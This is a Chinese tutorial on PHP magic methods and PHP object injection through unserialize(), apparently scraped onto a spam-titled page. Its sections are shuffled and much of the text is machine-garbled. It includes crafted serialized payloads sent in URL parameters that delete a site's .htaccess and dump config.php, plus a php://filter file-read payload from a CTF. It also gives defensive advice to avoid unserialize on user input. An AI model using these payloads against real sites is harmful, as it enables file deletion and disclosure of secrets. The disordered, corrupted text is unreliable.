金沙糖果派对网站app 4

0×02 php Magic方法

php类恐怕会含有部分特别的函数叫magic函数,magic函数命名是以符号“__”开头的,比如
__construct, __destruct, __toString, __sleep, __wakeup
和其它的部分实物。

这一个函数在某个境况下会自行调用,比如:

__construct 当叁个对象创造时调用 (constructor卡塔尔 __destruct
当一个对象被沦亡时调用 (destructor卡塔尔(قطر‎ __
toString当叁个目的被看做三个字符串使用

为了越来越好的驾驭magic方法是什么样行事的,让大家抬高中二年级个magic方法在我们的类中。

<?php
    class TestClass
    {
    // 一个变量public $variable = 'This is a string';// 一个简单的方法

    public function PrintVariable()
    {
    echo $this->variable . '<br />';
    }

    // Constructor

    public function __construct()
    {
    echo '__construct <br />';
    }

    // Destructor

    public function __destruct()
    {
    echo '__destruct <br />';
    }

    // Call

    public function __toString()
    {
    return '__toString<br />';
    }
    }

    // 创建一个对象
    // __construct会被调用

    $object = new TestClass();

    // 创建一个方法
    // 'This is a string’ 这玩意会被输出

    $object->PrintVariable();

    // 对象被当作一个字符串
    // __toString 会被调用

    echo $object;

    // End of PHP script
    // php脚本要结束了, __destruct会被调用

    ?>

小编们往里头放了两个 magic方法,__construct, __destruct和
__toString,你能够看出来,__construct在对象创建时调用,
__destruct在php脚本停止时调用,__toString在指标被作为一个字符串使用时调用。

这一个脚本会输出那狗样:

__construct 
This is a string 
__toString 
__destruct

那只是二个简练的事例,借使您想询问更加多关于magic函数的例证,请点击链接

0x04 豆蔻梢头道CTF中反种类化例题

$obj = new test(卡塔尔;     
//实例化对象,调用__construct()方法,输出__construct
$obj->echoP();          //调用echoP()方法,输出”abc”
echo $obj;              
//obj对象被看作字符串输出,调用__toString()方法,输出__toString
$s  =serialize($obj卡塔尔;    
//obj对象被体系化,调用__sleep()方法,输出__sleep
echo unserialize($s卡塔尔;     
//$s首先会被反体系化,会调用__wake(卡塔尔(قطر‎方法,被反系列化出来的靶子又被视作字符串,就能调用_toString()方法。
// 脚本结束又会调用__destruct()方法,输出__destruct
?>

0×09 结论

虽说很难找到何况很难利用,可是那实在真的很严重,可导招致美妙绝伦的狐狸尾巴。

0x05 小总结

上边显示的代码应用了LogClass对象同一时候还有大概会从顾客这里收受输入进行发系列化转化为一个User对象。
当我们付出如下的数量

0×01 漏洞案例

假诺您感觉那是个渣渣洞,那么请看一眼这些列表,一些被审计狗挖到过该漏洞的连串,你能够开采都是有的耳熟能详的玩意儿(就国外的话)

WordPress
3.6.1

Magento
1.9.0.1

Joomla 3.0.3

Ip board 3.3.5

除了等等一批系统,70%可能大致在此些还会有此外的php程序中还恐怕有不菲那体系型的尾巴,所以不要紧思量坐下喝杯咖啡並且试着去明白这篇小说。

金沙糖果派对网站app 1

金沙糖果派对网站app 2

news.php?user=O:4:”User”:2:{s:3:”age”;i:20;s:4:”name”;s:4:”John”;}

0×00 背景

PHP对象注入是多个丰富不感觉奇的露出马脚,那个类型的漏洞尽管有一点点麻烦使用,但依然非常危急,为了知道那几个漏洞,请读者具有根基的php知识。

队列符号:参数与变量之间用分号隔开分离,同一变量和平等参数之间的数码用冒号隔开分离。

unserialize — Creates a PHP value from a stored representation

0×08 怎样选取或然防止这一个漏洞

别在其他顾客可控之处选择“unserialize”,可以设想“json_decode“

最终PAYLOAD:

/*

    在这里边您能够将字符串 $dogdisc 存款和储蓄到另内地方如

0×05 php对象注入

今昔大家理解了系列化是如何做事的,大家该如何使用它?事实上,利用那玩意儿的或然性有广大种,关键决定于应用程序的流水生产线与,可用的类,与magic函数。

切记连串化对象的值是可控的。

你恐怕会找到生机勃勃套web程序的源代码,个中有些类的__wakeup 或者
__destruct and别的颠倒错乱的函数会耳熏目染到web程序。

打个借使,大家或者会找到二个类用于临时将日志储存进某些文件,当__destruct被调用时,日志文件会被删去。然后代码张这狗样。

public function LogData($text) { 
    echo 'Log some data: ' . $text . '<br />'; 
    file_put_contents($this->filename, $text, FILE_APPEND); 
} 
// Destructor 删除日志文件 
public function __destruct() { 
    echo '__destruct deletes "' . $this->filename . '" file. <br />'; unlink(dirname(__FILE__) . '/' . $this->filename);
} 
} ?>

某例子关于如何利用那么些类

<?php
include 'logfile.php';// 创建一个对象$obj = new LogFile();

// 设置文件名和要储存的日志数据

$obj->filename = 'somefile.log';
$obj->LogData('Test');

// php脚本结束啦,__destruct被调用,somefile.log文件被删除。

?>

在任何的脚本,我们可能又凑巧找到八个调用“unserialize”函数的,何况刚刚变量是顾客可控的,又正巧是$_GET之类的怎么东西的。

著作权归作者所有。
商业转载请联系作者获得授权,非商业转载请注明出处。
作者:Wujunze
链接:https://wujunze.com/php_class_inject.jsp?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io
来源:wujunze.com

<?php
include 'logfile.php';// ... 一些狗日的代码和 LogFile 类 ...// 简单的类定义

class User
{
// 类数据

public $age = 0;
public $name = '';

// 输出数据

public function PrintData()
{
echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
}
}

// 重建 用户输入的 数据

$usr = unserialize($_GET['usr_serialized']);

?>

您看,那几个代码调用了 “LogClass” 类,况且有四个 “unserialize”
值是大家得以注入的。

于是协会相同那样的东西:

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

到底产生了哪些吗,因为输入是可控的,所以大家得以协会放肆的体系化对象,举例:

<?php$obj = new LogFile();
$obj->filename = '.htaccess';echo serialize($obj) . '<br />';?>

其一会输出

O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";} 
__destruct deletes ".htaccess" file.

前段时间我们将组织过后的系列化对象发送给刚才的剧本:

script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess”;}

这会输出

__destruct deletes ".htaccess" file.

前几天 .htaccess 已经被干掉了,因为脚本甘休时
__destruct会被调用。但是大家曾经足以垄断“LogFile”类的变量啦。

那便是漏洞名称的原因:变量可控况兼开展了unserialize操作之处注入类别化对象,实今世码施行可能其余坑爹的行为。

尽管如此那不是二个很好的例子,不过本人相信您能够知晓那些定义,unserialize自动调用
__wakeup 和 __destruct,接着攻击者能够决定类变量,并且攻击web程序。

源码深入分析:

<?php
include “index.php”;
$obj = new LogClass();
$obj->logfilename = “login.log”;
$obj->logdata(‘记录日志’卡塔尔(قطر‎;
?>

0×03 php对象系列化

php允许保留一个对象方便以后重用,这些进程被堪称种类化,打个即使,你能够保留二个分包着客户音讯的对象方便等等重用。

为了种类化一个目的,你须要调用
“serialize”函数,函数会回去三个字符串,当您要求用到那一个目的的时候能够使用“unserialize”去重新建立对象。

让大家在连串化丢进这一个例子,看看体系化张什么样。

<?php
// 某类class User
{
// 类数据public $age = 0;
public $name = '';

// 输出数据

public function PrintData()
{
echo 'User ' . $this->name . ' is ' . $this->age
. ' years old. <br />';
}
}

// 创建一个对象

$usr = new User();

// 设置数据

$usr->age = 20;
$usr->name = 'John';

// 输出数据

$usr->PrintData();

// 输出序列化之后的数据

echo serialize($usr);

?>

它会输出

User John is 20 years old. 
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

你能够看出种类化之后的数码中 有
20和平条John,在那之中未有其余跟类有关的东西,独有此中的多少被数据化。

为了选用这几个指标,我们用unserialize重新建立对象。

<?php// 某类class User
{
// Class datapublic $age = 0;
public $name = '';

// Print data

public function PrintData()
{
echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
}
}

// 重建对象

$usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');

// 调用PrintData 输出数据

$usr->PrintData();

?>

着会输出

User John is 20 years old

有以下的魔术点子: __construct(), __destruct(), __call(),
__callStatic(), __get(), __set(), __isset(), __unset(),
__sleep(), __wakeup(), __toString(), __invoke(), __set(),
_state(), __clone(), __debugInfo() …

// 从客商选择输入发系列化为User对象
$usr = unserialize($_GET[“user”]);
?>

0×04 序列化magic函数

magic函数constructor (__construct)和 destructor (__destruct卡塔尔(قطر‎是会在对象创设或然销毁时自动调用,其他的部分magic函数会在serialize 大概unserialize的时候被调用。

__sleep magic方法在叁个对象被连串化的时候调用。 __wakeup
magic方法在二个目的被反连串化的时候调用。

注意 __sleep 必得重回叁个数组与类别化的变量名。

<?php
class Test
{
public $variable = 'BUZZ';
public $variable2 = 'OTHER';public function PrintVariable()
{
echo $this->variable . '<br />';
}public function __construct()
{
echo '__construct<br />';
}

public function __destruct()
{
echo '__destruct<br />';
}

public function __wakeup()
{
echo '__wakeup<br />';
}

public function __sleep()
{
echo '__sleep<br />';

return array('variable', 'variable2');
}
}

// 创建一个对象,会调用 __construct

$obj = new Test();

// 序列化一个对象,会调用 __sleep

$serialized = serialize($obj);

//输出序列化后的字符串

print 'Serialized: ' . $serialized . <br />';

// 重建对象,会调用 __wakeup

$obj2 = unserialize($serialized);

//调用 PintVariable, 会输出数据 (BUZZ)

$obj2->PrintVariable();

// php脚本结束,会调用 __destruct

?>

这个人会输出:

__construct 
__sleep 
Serialized: O:4:"Test":2:
{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";} 
__wakeup 
BUZZ 
__destruct 
__destruct

您能够看来,大家创设了三个目的,系列化了它(然后__sleep被调用),之后用类别化对象重新建立后的指标创制了另一个对象,接着php脚本截止的时候三个指标的__destruct都会被调用。

构造方法是类中的二个非常格局。当使用 new
操作符创设叁个类的实例时,构造方法将会活动调用,其名目必需是
__construct()。在七个类中只可以声Bellamy个结构方法,而是独有在历次创造对象的时候都会去调用三遍布局方法,不能够积极的调用这一个方式,所以日常用它施行一些行之有效的最早化职责。该办法无再次来到值。

print ‘<BR>’;

0×07 别的的运用格局

或是其余的一些magic函数海存在使用点:例如__call
会在目的调用不设有的函数时调用,__get 和
__set会在对象尝试访谈一些不设有的类,变量等等时调用。

而是须要介意的是,利用意况不限于magic函数,也许有风度翩翩部分方法能够在四分之二的函数中选拔这一个漏洞,打个纵然,三个模块大概定义了四个叫get的函数实行部分乖巧的操作,举例访谈数据库,那就大概变成sql注入,决议于函数本人的操作。

唯风流倜傥的叁个技能难题在于,注入的类必需在注入点所在的地点,可是有的模块或许脚本会利用“autoload”的职能,具体能够在那地驾驭

2016xctf的反体系化标题

serialize — Generates a storable representation of a value

0×01 PHP类和对象

类和变量是极度轻易精晓的php概念,打个假如,下边包车型客车代码在一个类中定义了多少个变量和三个主意。

<?php

class TestClass
{
    // A variable

    public $variable = 'This is a string';

    // A simple method

    public function PrintVariable()
    {
        echo $this->variable;
    }
}

// Create an object

$object = new TestClass();

// Call a method

$object->PrintVariable();

?>

它创设了叁个指标而且调用了 PrintVariable 函数,该函数会输出变量
variable。

若是想打听越来越多关于php面向对象编制程序的知识 请点:

session,cookie,数据库,php文件

*/

//大家在那处用 unserialize(卡塔尔 还原已经体系化的靶子
$pet = unserialize($dogdisc卡塔尔(قطر‎; //那个时候的 $pet 已然是近期的 $ourfirstdog
对象了
//拿到年龄和名字属性
$old = $pet->getage();
$name = $pet->getname();
//那么些类那时无需实例化能够继续使用,并且品质和值都以维持在类别化从前的情状
print “Our first dog is called $name and is $old days old<br>”;
print ‘<BR>’;
?>

0×06 粗心浮气的注入点

先不谈 __wakeup 和
__destruct,还会有生机勃勃部分很宽泛的注入点允许你接受那个项目标露出马脚,一切都是决意于程序逻辑。

打个假使,某客户类定义了一个__toString为了让应用程序能够将类作为三个字符串输出(echo
$obj) ,况兼别的类也说不佳定义了一个类允许__toString读取有些文件。

<?php
// … 一些include ...class FileClass
{
// 文件名public $filename = 'error.log';

//当对象被作为一个字符串会读取这个文件

public function __toString()
{
return file_get_contents($this->filename);
}
}

// Main User class

class User
{
// Class data

public $age = 0;
public $name = '';

// 允许对象作为一个字符串输出上面的data

public function __toString()
{
return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
}
}

// 用户可控

$obj = unserialize($_GET['usr_serialized']);

// 输出 __toString

echo $obj;

?>

so,大家组织url

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

再思谋,即便大家用连串化调用 FileClass呢

我们成立利用代码

<?php$fileobj = new FileClass();
$fileobj->filename = 'config.php';echo serialize($fileobj);?>

随时用调换的exp注入url

script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php”;}

接着网页会输出 config.php的源代码

<?php$private_data = 'MAGIC';?>

ps:笔者愿意那让您可以预知知道。

金沙糖果派对网站app 3金沙糖果派对网站app 4

class UserClass {
    public $age = 0;
    public $name = ”;
    public function __toString() {
        return ‘User ‘.$this->name.” is “.$this->age.’ years old.
<br/>’;
    }
}

array serialize code:

news.php?user=O:8:”LogClass”:1:{s:11:”logfilename”;s:9:”.htaccess”;}

a:2:{s:4:”name”;s:8:”Thinking”;s:3:”sex”;s:3:”man”;} save data is:
a:2:{s:4:”name”;s:8:”Thinking”;s:3:”sex”;s:3:”man”;}

如此的讲话是足以健康使用的,也是程序猿希望利用的措施。
不过即使提交的数目为:

概念:对象是在内存中存款和储蓄的数据类型,寿命日常随着生成该目的的程序的甘休而终止,不过有个别意况下需求将指标的动静保存下去,然后在必要选用的时候将目的复苏,对象情形的保存操作正是对象连串化的进程。对象系列化就是将目标转变为2进制字符串实行保存。

在任何类中利用LogClass
logLogin.php

体系化后对象的格式: 引用上述示范代码中的输出结果 。

要对前后相继中的种种边界条件举办测量试验
制止客户对于unserialize(卡塔尔(قطر‎参数是可控的,可以杜撰动用json_decode方法来拓宽传参。

output:

<?php
class test{
    public $varr1=”abc”;
    public $varr2=”123″;
    public function echoP(){
        echo $this->varr1.”<br>”;
    }
    public function __construct(){
        echo “__construct<br>”;
    }
    public function __destruct(){
        echo “__destruct<br>”;
    }
    public function __toString(){
        return “__toString<br>”;
    }
    public function __sleep(){
        echo “__sleep<br>”;
        return array(‘varr1′,’varr2’);
    }
    public function __wakeup(){
        echo “__wakeup<br>”;
    }
}

output: __toString is work

 代码如下

主题材料原因:漏洞的发源在于unserialize()函数的参数可控。借使反类别化对象中存在魔术点子,而且魔术点子中的代码或变量客户可控,就或者发生反体系化漏洞,依据反种类化后不等的代码能够以致各个攻击,如代码注入、SQL注入、目录遍历等等。

<?php
class FileClass {
    public $filename = “error.log”;
    public function __toString() {
  echo “filename产生了变动==>” . $this->filename ;
        return @file_get_contents($this->filename);
    }
}

unserialize code:

指标明入

析构方法__destruct()同意在销毁一个类在此以前执行实行析构方法,与布局方法对应的正是析构方法,析构方法允许在销毁三个类早前执行的生机勃勃对操作或完结都部队分效果,例如说关闭文件、释放结果集,程序运行结束等。析构函数不能带有任何参数,其名目必得是
__destruct()

    function dog($in_name=”unnamed”,$in_age=”0″,$in_owner=”unknown”)
{
        $this->name = $in_name;
        $this->age = $in_age;
        $this->owner = $in_owner;
    }

output: __construct is work

那正是说最终就能够输出delete .htaccess。
能够看出通过协会的数额,导致实践了LogClass中的__destruct(State of Qatar方法然后删除了网站中任重先生而道远的陈设文件。
从地方这些例子也得以看出来,若无严控客户的输入同期对顾客的输入实行了反系列化的操作,那么就有比超级大可能率会兑今世码施行的疏漏。

变量和参数类型:string:用s表示,Int:用i表示,Array:用a表示。

 代码如下

POST DATA:the user is admin

原理

先是构造系列化的字符串O:4:”Read”:1:{s:4:”file”;s:57:”php://filter/read=convert.base64-encode/resource=f1a9.php”;}下一场进行如下要求。

地方的这段代码便是三个例行的利用LogClass类来变成日志记录的作用。
下边展现的是存在对象注入漏洞的行使例子。
news.php

index.php的源码:

如此那般就足以读取到config.php中的源代码了。

admin

相关文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注